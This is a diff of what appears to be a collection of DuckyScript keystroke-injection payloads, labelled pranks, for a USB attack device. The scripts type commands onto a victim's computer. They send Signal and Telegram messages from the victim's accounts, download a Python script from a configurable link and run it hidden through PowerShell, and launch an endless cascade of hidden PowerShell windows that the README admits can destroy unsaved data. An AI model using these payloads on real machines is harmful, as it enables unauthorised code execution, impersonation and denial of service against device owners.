REM REQUIRED - Receiver number
|
REM REQUIRED - Receiver number
|
||||||
DEFINE NUMBER 3332211000
|
DEFINE #NUMBER 3332211000
|
||||||
|
|
||||||
REM REQUIRED - Message to send
|
REM REQUIRED - Message to send
|
||||||
DEFINE MESSAGE YOUR_MESSAGE
|
DEFINE #MESSAGE example
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
DELAY 1000
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING powershell
|
STRINGLN powershell
|
||||||
ENTER
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING Stop-Process -Name "Signal"
|
STRINGLN Stop-Process -Name "Signal"
|
||||||
ENTER
|
DELAY 500
|
||||||
STRING Start-Process $Env:USERPROFILE\AppData\Local\Programs\signal-desktop\Signal.exe; exit
|
STRINGLN Start-Process $Env:USERPROFILE\AppData\Local\Programs\signal-desktop\Signal.exe; exit
|
||||||
ENTER
|
|
||||||
DELAY 5000
|
DELAY 5000
|
||||||
TAB
|
TAB
|
||||||
TAB
|
TAB
|
||||||
TAB
|
TAB
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 100
|
DELAY 100
|
||||||
STRING NUMBER
|
STRING #NUMBER
|
||||||
DELAY 100
|
DELAY 100
|
||||||
TAB
|
TAB
|
||||||
DELAY 100
|
DELAY 100
|
||||||
|
@ -44,8 +86,7 @@ DELAY 200
|
||||||
|
|
||||||
REM This is the message that will be sent.
|
REM This is the message that will be sent.
|
||||||
REM You can change it as you want, if you want.
|
REM You can change it as you want, if you want.
|
||||||
STRING YOUR_MESSAGE
|
STRINGLN #MESSAGE
|
||||||
ENTER
|
|
||||||
|
|
||||||
REM Closing Signal App
|
REM Closing Signal App
|
||||||
DELAY 500
|
DELAY 500
|
||||||
|
|
|
@ -1,37 +1,64 @@
|
||||||
|
REM_BLOCK
|
||||||
REM #########################################
|
#########################################
|
||||||
REM # |
|
# #
|
||||||
REM # Title : Send Telegram Messages |
|
# Title : Send Telegram Messages #
|
||||||
REM # Author : Aleff |
|
# Author : Aleff #
|
||||||
REM # Version : 1.0 |
|
# Version : 1.1 #
|
||||||
REM # Category : Prank |
|
# Category : Prank #
|
||||||
REM # Target : Linux |
|
# Target : Linux #
|
||||||
REM # |
|
# #
|
||||||
REM #########################################
|
#########################################
|
||||||
|
|
||||||
REM Requirements:
|
Requirements:
|
||||||
REM - Internet Connection
|
- Internet Connection
|
||||||
REM - telegram-desktop installed and activated
|
- telegram-desktop installed and activated
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM Define the message receiver username
|
||||||
|
DEFINE #USERNAME @example
|
||||||
|
|
||||||
|
REM Define the message(s)
|
||||||
|
DEFINE #MESSAGE1 example
|
||||||
|
|
||||||
|
EXTENSION DETECT_READY
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
|
||||||
|
TARGETS:
|
||||||
|
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||||
|
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #RESPONSE_DELAY 25
|
||||||
|
DEFINE #ITERATION_LIMIT 120
|
||||||
|
|
||||||
|
VAR $C = 0
|
||||||
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY #RESPONSE_DELAY
|
||||||
|
$C = ($C + 1)
|
||||||
|
END_WHILE
|
||||||
|
CAPSLOCK
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
DELAY 1000
|
|
||||||
CTRL-ALT t
|
CTRL-ALT t
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
|
|
||||||
STRING telegram-desktop
|
STRINGLN telegram-desktop
|
||||||
ENTER
|
|
||||||
REM It depends by the computer...
|
REM It depends by the computer...
|
||||||
DELAY 3000
|
DELAY 3000
|
||||||
|
|
||||||
REM Define the message receiver username
|
STRINGLN #USERNAME
|
||||||
DEFINE USERNAME @example
|
|
||||||
STRING USERNAME
|
|
||||||
ENTER
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
|
|
||||||
REM Define the message(s)
|
STRINGLN #MESSAGE1
|
||||||
DEFINE MESSAGE1 example
|
|
||||||
STRING MESSAGE1
|
|
||||||
ENTER
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
REM other messages here...
|
REM other messages here...
|
||||||
REM ...
|
REM ...
|
||||||
|
|
|
@ -1,33 +1,70 @@
|
||||||
REM ############################################
|
REM_BLOCK
|
||||||
REM # |
|
############################################
|
||||||
REM # Title : The Mouse Moves By Itself |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : The Mouse Moves By Itself #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Prank |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10/11 |
|
# Category : Prank #
|
||||||
REM # |
|
# Target : Windows 10/11 #
|
||||||
REM ############################################
|
# #
|
||||||
|
############################################
|
||||||
|
|
||||||
REM Requirements:
|
|
||||||
REM - Internet Connection
|
|
||||||
|
|
||||||
|
Requirements:
|
||||||
|
- Internet Connection
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM REQUIRED - Set your Python script link
|
REM REQUIRED - Set your Python script link
|
||||||
DEFINE SCRIPT-PY-LINK example.com
|
DEFINE #SCRIPT-PY-LINK example.com
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
DELAY 1000
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING powershell
|
STRINGLN powershell
|
||||||
ENTER
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
|
|
||||||
STRING Invoke-WebRequest -Uri "
|
STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
|
||||||
STRING SCRIPT-PY-LINK
|
|
||||||
STRING " -OutFile "script.py"
|
|
||||||
ENTER
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
|
|
||||||
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
|
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
|
||||||
|
|
|
@ -1,15 +1,18 @@
|
||||||
REM ############################################################
|
REM_BLOCK
|
||||||
REM # #
|
############################################################
|
||||||
REM # Title : This damn shell doesn't work, SO SAD! :C #
|
# #
|
||||||
REM # Author : Aleff #
|
# Title : This damn shell doesn't work, SO SAD! :C #
|
||||||
REM # Version : 1.0 #
|
# Author : Aleff #
|
||||||
REM # Category : Prank #
|
# Version : 1.0 #
|
||||||
REM # Target : Linux #
|
# Category : Prank #
|
||||||
REM # #
|
# Target : Linux #
|
||||||
REM ############################################################
|
# #
|
||||||
|
############################################################
|
||||||
|
|
||||||
|
Requirements:
|
||||||
|
- Nothing <3
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
|
||||||
REM - Nothing <3
|
|
||||||
REM With Kali Linux 2020.4, the new default shell is now ZSH for users who install the distribution.
|
REM With Kali Linux 2020.4, the new default shell is now ZSH for users who install the distribution.
|
||||||
DEFINE #TARGET_KALI_LINUX TRUE
|
DEFINE #TARGET_KALI_LINUX TRUE
|
||||||
|
|
||||||
|
|
|
@ -1,27 +1,26 @@
|
||||||
REM ####################################
|
REM_BLOCK
|
||||||
REM # |
|
####################################
|
||||||
REM # Title : Try To Catch Me |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Try To Catch Me #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Prank |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10/11 |
|
# Category : Prank #
|
||||||
REM # |
|
# Target : Windows 10/11 #
|
||||||
REM ####################################
|
# #
|
||||||
|
####################################
|
||||||
|
|
||||||
|
Requirements:
|
||||||
REM Requirements:
|
- Python
|
||||||
REM - Python
|
- Internet Connection
|
||||||
REM - Internet Connection
|
END_REM
|
||||||
|
|
||||||
REM REQUIRED - Set your Python script link
|
REM REQUIRED - Set your Python script link
|
||||||
DEFINE #SCRIPT-PY-LINK example.com
|
DEFINE #SCRIPT-PY-LINK example.com
|
||||||
|
|
||||||
|
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING powershell
|
STRINGLN powershell
|
||||||
ENTER
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
|
|
||||||
STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
|
STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
|
||||||
|
|
|
@ -0,0 +1,23 @@
|
||||||
|
# Windows Spam Terminals
|
||||||
|
|
||||||
|
This script is designed to work on Windows devices. It opens an infinite number of PowerShell terminals, effectively spamming the system with terminal instances.
|
||||||
|
|
||||||
|
Be very careful about using this payload as this activity could alter the state of the computer by causing unsaved data to be lost. For this reason make sure you are authorized before running this script otherwise you may risk a loss of data.
|
||||||
|
|
||||||
|
### Details
|
||||||
|
|
||||||
|
- **Title**: Windows Spam Terminals
|
||||||
|
- **Author**: bst04 - Aleff
|
||||||
|
- **Version**: 1.0
|
||||||
|
- **Category**: Prank
|
||||||
|
- **Target**: Windows
|
||||||
|
|
||||||
|
### Dependencies
|
||||||
|
|
||||||
|
This payload is plug and play <3
|
||||||
|
|
||||||
|
## How It Works 📜
|
||||||
|
|
||||||
|
1. Uses an extension (`EXTENSION PASSIVE_WINDOWS_DETECT`) to detect when the device is ready
|
||||||
|
2. After readiness is confirmed, the script execute a powershell script that create an infinite number of PowerShell terminals
|
||||||
|
|
|
@ -0,0 +1,58 @@
|
||||||
|
REM_BLOCK
|
||||||
|
############################################
|
||||||
|
# #
|
||||||
|
# Title : Windows Spam Terminals #
|
||||||
|
# Author : bst04 - Aleff #
|
||||||
|
# Version : 1.0 #
|
||||||
|
# Category : Prank #
|
||||||
|
# Target : Windows #
|
||||||
|
# #
|
||||||
|
############################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRINGLN powershell -w h -Command "while ($true) { Start-Process powershell -ArgumentList '-NoExit', '-Command', 'Start-Process powershell -w h -ArgumentList \"-NoExit\", \"-Command\", \"Start-Process powershell -w h\"' }"
|
Loading…
Reference in New Issue